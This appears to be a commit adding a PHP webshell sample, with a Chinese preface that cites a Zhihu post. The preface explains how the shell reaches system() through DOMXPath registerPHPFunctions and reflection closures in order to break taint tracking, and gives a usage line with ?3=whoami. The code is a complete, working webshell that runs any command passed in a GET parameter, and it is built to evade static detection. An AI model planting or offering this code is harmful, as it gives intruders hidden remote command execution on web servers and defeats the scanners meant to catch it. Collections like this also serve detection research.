Create system2022-08-22.php

from : https://zhuanlan.zhihu.com/p/550150061
该样本需要一些条件，前提是开启了php-xml拓展才可以，其原理就是用XML去注册一个registerPHPFunctions，也就是我们想要执行的system再利用getClosure去触发该方法而构成的webshell，其中即利用到了PHP的特性，利用registerNamespace和registerPHPFunctions来中断污点追踪，从而RCE
usage: xxx.php?3=whoami

php/system2022-08-22.php

@@ -0,0 +1,24 @@
+<?php
+// dom and xml needed, install php-xml and leave php.ini as default.
+// Author:LemonPrefect
+$cmd = $_GET[3];
+$_REQUEST[1] = "//book[php:functionString('system', '$cmd') = 'PHP']";
+$_REQUEST[2] = ["php", "http://php.net/xpath"];
+$xml = <<< XML
+<?xml version="1.0" encoding="UTF-8"?>
+<books>
+    <book>
+        <title>We are the champions</title>
+        <author>LemonPrefect</author>
+        <author>H3h3QAQ</author>
+    </book>
+</books>
+XML;
+​
+$doc = new DOMDocument;
+$doc->loadXML($xml);
+$clazz = (new ReflectionClass("DOMXPath"));
+$instance = $clazz->newInstance($doc);
+$clazz->getMethod("registerNamespace")->getClosure($instance)->__invoke(...$_REQUEST[2]);
+$clazz->getMethod("registerPHPFunctions")->invoke($instance);
+$clazz->getMethod("query")->getClosure($instance)->__invoke($_REQUEST[1]);